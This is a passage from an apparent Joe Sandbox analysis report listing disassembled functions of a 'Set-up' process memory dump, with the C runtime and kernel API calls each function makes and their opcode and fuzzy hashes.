                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              • Opcode ID: 397036b398c79250e7f156f8731fea3f4a4daab3fc0e7223ec6d4ee434e88114
                                                                                              • Instruction ID: e8764fc69244f9c2ded7ed923fe812319800126767c2dd441dda89a3767f4119
                                                                                              • Opcode Fuzzy Hash: 397036b398c79250e7f156f8731fea3f4a4daab3fc0e7223ec6d4ee434e88114
                                                                                              • Instruction Fuzzy Hash: 1311C276D002249BDF209FF8D84869EB7F8FB4E365F960961D511E7200DB79DA40CB91
                                                                                              Function 6BBA780F Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6BBA7835
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 6BBA7842
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6BBA785A
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,00000000,00000000), ref: 6BBA7868
                                                                                              • InitializeSListHead.KERNEL32(00000028,?,?,?,?,?,?,00000000,00000000), ref: 6BBA7887
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionHeadInitializeLastListThrow
                                                                                              • String ID:
                                                                                              • API String ID: 2464499457-0
                                                                                              • Opcode ID: 5e95c75f0ebffce75a5df3749c82f99e1eb6d75302ef066ced436a38ef544a2b
                                                                                              • Instruction ID: cabdae8a1629b39df197ad59f503d357cf1f90556103ec8abee1e0925c4edc60
                                                                                              • Opcode Fuzzy Hash: 5e95c75f0ebffce75a5df3749c82f99e1eb6d75302ef066ced436a38ef544a2b
                                                                                              • Instruction Fuzzy Hash: 40015EB1804745AFC720AF66CCC596BFBECFA082443544D7DE1AAC3600E779E548CB61
                                                                                              Function 6BBAC86F Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC4DA
                                                                                              • free.MSVCR100(00000000,?,?,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC4DD
                                                                                              • DeleteCriticalSection.KERNEL32(0000000E,?,?,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC504
                                                                                              • DecodePointer.KERNEL32(00000006,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC880
                                                                                              • TlsFree.KERNEL32(0000000E,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC89E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalDeleteSection$DecodeFreePointerfree
                                                                                              • String ID:
                                                                                              • API String ID: 1464103408-0
                                                                                              • Opcode ID: d580c3ee6ad2712d2fbf7391e45638e184da0bec92f237b26ce93635c732cbbb
                                                                                              • Instruction ID: 11d75a78dcf839823c40533bcb9533f804b8b2a90a34efb55eae2867499a63e0
                                                                                              • Opcode Fuzzy Hash: d580c3ee6ad2712d2fbf7391e45638e184da0bec92f237b26ce93635c732cbbb
                                                                                              • Instruction Fuzzy Hash: EE01D232C08690ABDA305F288C85A69B3FCDF86671325075AE874D70A0CB2ECD458A34
                                                                                              Function 6BB61635 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno
                                                                                              • String ID:
                                                                                              • API String ID: 2918714741-0
                                                                                              • Opcode ID: 7f0233ba04b6b693044806ee86adc115b60e614443f263a97df727de8bae0fdc
                                                                                              • Instruction ID: 5de0a920ba5f93664d7ef3ff0869e403c013d1e2fa7f27c1c3ed99861a141af5
                                                                                              • Opcode Fuzzy Hash: 7f0233ba04b6b693044806ee86adc115b60e614443f263a97df727de8bae0fdc
                                                                                              • Instruction Fuzzy Hash: D2019E74504395DFD7249F6AD481B2873A8DF163A8F1852A9E5508A190FB7CDC80CFA2
                                                                                              Function 6BB61C13 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_wmemsetmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 286551074-0
                                                                                              • Opcode ID: 0fc1868e71f3fb815dc008e129040931b69018a5b417317c345cb06ab3f3e45f
                                                                                              • Instruction ID: 056a557f9827fd807287cdbbbc904acb2b4f0aa7cc12c89c6686af9fcafe103e
                                                                                              • Opcode Fuzzy Hash: 0fc1868e71f3fb815dc008e129040931b69018a5b417317c345cb06ab3f3e45f
                                                                                              • Instruction Fuzzy Hash: 8F01DF325442A9EFDF224E29EC017DD3764EF04B94F044026FD185A190F7BDC990CE82
                                                                                              Function 6BB6E2C0 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno
                                                                                              • String ID:
                                                                                              • API String ID: 2918714741-0
                                                                                              • Opcode ID: 2e2c6133e67dc508463d10d431fac4f051eb4a40ca8b912ec9ca342d6b22e40f
                                                                                              • Instruction ID: 7f684222dbfae81eba4b1cb8f670e16ca43a45a3200a24b71015ef44e3ebd298
                                                                                              • Opcode Fuzzy Hash: 2e2c6133e67dc508463d10d431fac4f051eb4a40ca8b912ec9ca342d6b22e40f
                                                                                              • Instruction Fuzzy Hash: 50017C305247849FD7255F7AD88176C7BA5EF4A3A9F00029AD5604B290FB7CAC40DFA1
                                                                                              Function 6BB60110 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_memsetmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 2314827996-0
                                                                                              • Opcode ID: 24d3509d602729fcf9db17f7d46f62d11e562c21541381a8313e25e63287101c
                                                                                              • Instruction ID: cc1fc1346506d8195522227874054f37bc982012e2b89ff29c20c84ddf3e706c
                                                                                              • Opcode Fuzzy Hash: 24d3509d602729fcf9db17f7d46f62d11e562c21541381a8313e25e63287101c
                                                                                              • Instruction Fuzzy Hash: 31016232544398FBCF225E25EC497DD3754EF04B58F004466F9185A191E77D8990CF92
                                                                                              Function 6BB716B5 Relevance: 7.5, APIs: 5, Instructions: 45COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _get_osfhandle.MSVCR100(00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716BF
                                                                                              • SetFilePointer.KERNEL32(00000000,?,00000000,6BB6D354,00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716D8
                                                                                              • _errno.MSVCR100(?,?,6BB6D354,?,00000000,00000000), ref: 6BB9036B
                                                                                              • GetLastError.KERNEL32(?,6BB6D354,?,00000000,00000000), ref: 6BB9037E
                                                                                              • __dosmaperr.LIBCMT(00000000,?,6BB6D354,?,00000000,00000000), ref: 6BB9038A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer__dosmaperr_errno_get_osfhandle
                                                                                              • String ID:
                                                                                              • API String ID: 1165083932-0
                                                                                              • Opcode ID: 33dcf94ecdac0297e5285af4e35841444468cbad5cdb5abf51d492403e7a9367
                                                                                              • Instruction ID: 095d67b44f6ec6c499cfb4460ef393b66c747897a12e39a81f820ada9a0d94f1
                                                                                              • Opcode Fuzzy Hash: 33dcf94ecdac0297e5285af4e35841444468cbad5cdb5abf51d492403e7a9367
                                                                                              • Instruction Fuzzy Hash: ED01F433214AA4AFCB116EBC9C04A4E3769EF87775B190761F534DB1E0EB38C8018BA4
                                                                                              Function 6BB63798 Relevance: 7.5, APIs: 5, Instructions: 43COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(?,6BB62D92,?,?,?,00000000,?), ref: 6BB893B8
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,6BB62D92,?,?,?,00000000,?), ref: 6BB893C3
                                                                                              • _errno.MSVCR100(?,?,6BB62D92,?,?,?,00000000,?), ref: 6BB893CD
                                                                                              • _errno.MSVCR100 ref: 6BB893E4
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,6BB62D92,?,?,?,00000000,?), ref: 6BB893EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2819658684-0
                                                                                              • Opcode ID: 4b4d150b7e77dca16d8177f797b708a718b730cf281ba2991a1ce8cb57af46de
                                                                                              • Instruction ID: d1afccd6fd09b0398122b856e05c46c19ae9ee54247b65c11acd4719bfb0ab63
                                                                                              • Opcode Fuzzy Hash: 4b4d150b7e77dca16d8177f797b708a718b730cf281ba2991a1ce8cb57af46de
                                                                                              • Instruction Fuzzy Hash: F3018131401699EBCF111FB8DC01BAE3B54AF41778F001645F938466E1EBBD8860CFA5
                                                                                              Function 6BB6E651 Relevance: 7.5, APIs: 5, Instructions: 42COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2819658684-0
                                                                                              • Opcode ID: 7bbae7128125840f7d256313ad025255df6e0a456f57df3873bbbcdee5d89585
                                                                                              • Instruction ID: 9349596d34d553e20e16fa38d94479e6779144dd21304bc08c30139a820ae77f
                                                                                              • Opcode Fuzzy Hash: 7bbae7128125840f7d256313ad025255df6e0a456f57df3873bbbcdee5d89585
                                                                                              • Instruction Fuzzy Hash: 75018631840A99EADF111EB4DC01B9E3B549F42774F000645E9684D1E1E77D8860CFE1
                                                                                              Function 6BB9F2B7 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9F2BE
                                                                                              • EnterCriticalSection.KERNEL32(6BB9D93F,00000008,6BBA9035), ref: 6BB9F2D0
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000024), ref: 6BB9F2E2
                                                                                                • Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6BB9F307
                                                                                                • Part of subcall function 6BBA7EE6: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6BBA7F10
                                                                                                • Part of subcall function 6BBA7EE6: GetLastError.KERNEL32(?,00000000,00000000), ref: 6BBA7F1D
                                                                                                • Part of subcall function 6BBA7EE6: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6BBA7F35
                                                                                                • Part of subcall function 6BBA7EE6: _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,00000000,00000000), ref: 6BBA7F43
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BB9F329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@CriticalSection$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateEnterErrorEventExceptionH_prolog3LastLeaveThrowmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 921447554-0
                                                                                              • Opcode ID: c0e58289f9e568b31b2e0e0c4951b85820b3a62b22ca639b107b9da71902b1c7
                                                                                              • Instruction ID: c6a42c684e909a78208475d54bb51d39ee93600f2568354968df3f11ae76f635
                                                                                              • Opcode Fuzzy Hash: c0e58289f9e568b31b2e0e0c4951b85820b3a62b22ca639b107b9da71902b1c7
                                                                                              • Instruction Fuzzy Hash: C5017C31D1AA95EFDB51EBB8950679DBAB0FF06758F5004A6E400E7280E7BC9A04C792
                                                                                              Function 6BB72F0F Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB72F3E
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _fread_nolock_s.MSVCR100(?,?,?,?,?,6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB72F56
                                                                                                • Part of subcall function 6BB72E42: memcpy_s.MSVCR100(?,?,?,?), ref: 6BB72EEB
                                                                                                • Part of subcall function 6BB72A86: _unlock_file.MSVCR100(6BB72F6D,6BB72F6D), ref: 6BB72A89
                                                                                              • _memset.LIBCMT(?,00000000,000000FF,6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB88D02
                                                                                              • _errno.MSVCR100(6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB88D0A
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB88D15
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_memset_unlock_filememcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 3226975504-0
                                                                                              • Opcode ID: 432785bd880cb237c7a6b95025af9ac7594f3927a3424da0a191a2b9eeaef6dc
                                                                                              • Instruction ID: 3a04ea8f0085df6df0f59a39f7759bc8fed85355e7aff9043e1d3d3c80d70786
                                                                                              • Opcode Fuzzy Hash: 432785bd880cb237c7a6b95025af9ac7594f3927a3424da0a191a2b9eeaef6dc
                                                                                              • Instruction Fuzzy Hash: E2015A7180129AEBCF21AFB5CC0249E3B20EF05794F408129F834151A0E7398AA1DFD1
                                                                                              Function 6BB6CA4F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _control87.MSVCR100(00000001,?,00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB6CA7D
                                                                                              • _control87.MSVCR100(00000000,00000000,00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924BB
                                                                                              • _errno.MSVCR100(00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924C4
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924CE
                                                                                              • _control87.MSVCR100(00000001,?,00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _control87$_errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 1498936549-0
                                                                                              • Opcode ID: bf4e1a7da49c6d64d966f304bc058d75b43548e15341f806baddd6ebdcd0a6cc
                                                                                              • Instruction ID: b4e18360e8ce0f520ee6a2d14d85c97142c46e416dae16e6e61fa73abdbe28de
                                                                                              • Opcode Fuzzy Hash: bf4e1a7da49c6d64d966f304bc058d75b43548e15341f806baddd6ebdcd0a6cc
                                                                                              • Instruction Fuzzy Hash: 09F09032A587A46BDB256E78A802BAD3394DF05BA0F104429FE54DB380EB789C009698
                                                                                              Function 6BB9BCC9 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6BBAAC51: CreateThread.KERNEL32(00000000,00000000,-00000018,6BBA0ED5,00010000,?), ref: 6BBAAC8D
                                                                                                • Part of subcall function 6BBAAC51: GetLastError.KERNEL32 ref: 6BBAAC97
                                                                                                • Part of subcall function 6BBAAC51: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBAACAF
                                                                                                • Part of subcall function 6BBAAC51: _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BBAACBD
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BCEF
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BD07
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9BD15
                                                                                              • SetThreadPriority.KERNEL32(00000000,0000000F), ref: 6BB9BD1D
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BD27
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThreadThrow$CreatePriority
                                                                                              • String ID:
                                                                                              • API String ID: 3804766065-0
                                                                                              • Opcode ID: 8bba0c1ce4c6178777af402f168d8efd0cb69c9d8114d5126d276875546a8885
                                                                                              • Instruction ID: 9d096a512b9cdc0d68662cbd09429bdcbff6384d17fb71b7a8299756981ca790
                                                                                              • Opcode Fuzzy Hash: 8bba0c1ce4c6178777af402f168d8efd0cb69c9d8114d5126d276875546a8885
                                                                                              • Instruction Fuzzy Hash: D0F08272A442976AEB307FB19C0AB6B36ACEF03B94F1504B4F515E6081FBBDE0048665
                                                                                              Function 6BB9B795 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT(?,00000000,0000000C), ref: 6BB9B7A0
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B7A8
                                                                                                • Part of subcall function 6BB9B6C7: __EH_prolog3.LIBCMT ref: 6BB9B6CE
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B7B2
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 6BB9B7C4
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB9B7CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version@$Concurrency@@Manager@1@ProcessResource$AffinityCurrentH_prolog3Mask_memset
                                                                                              • String ID:
